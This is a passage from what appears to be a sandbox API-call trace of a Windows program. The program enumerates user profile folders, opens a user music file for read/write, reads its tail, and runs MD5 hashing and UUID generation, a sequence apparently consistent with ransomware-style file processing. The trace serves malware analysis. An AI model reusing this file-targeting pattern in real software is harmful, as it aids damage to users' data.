lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0095.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.187] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0095.188] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.188] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.188] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.188] PathFindFileNameW (pszPath="") returned="" [0095.188] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0095.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.188] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0095.188] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0095.188] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0095.188] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.188] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.188] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0095.188] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.188] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.189] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.189] PathFindFileNameW (pszPath="") returned="" [0095.189] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0095.189] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.189] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.189] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0095.189] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.189] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.189] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.189] PathFindFileNameW (pszPath="") returned="" [0095.189] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0095.189] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0095.189] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0095.189] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0095.189] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.189] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.190] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0095.190] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.190] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.190] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.190] PathFindFileNameW (pszPath="") returned="" [0095.190] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0095.190] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0095.190] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0095.190] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0095.190] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0095.190] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0095.190] PathFindFileNameW (pszPath="") returned="" [0095.190] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7bJ1P.m4a") returned=".m4a" [0095.191] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7bJ1P.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7bj1p.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.191] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=93465) returned 1 [0095.191] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.194] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16cf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.194] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.196] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.197] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.197] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.197] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.197] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.197] GetLastError () returned 0x0 [0095.197] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.197] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.197] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.197] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.197] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16d20) returned 0x9a06a00 [0095.198] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1968 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9390 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f19b0 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93a8 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.199] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d93f0 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d93d8 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93f0 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.200] GetCurrentThreadId () returned 0x8c4 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5d10 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.200] GetCurrentThreadId () returned 0x8c4 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93f0 [0095.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93c0 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9408 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d93d8 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.203] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d93d8 | out: hHeap=0x680000) returned 1 [0095.203] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | 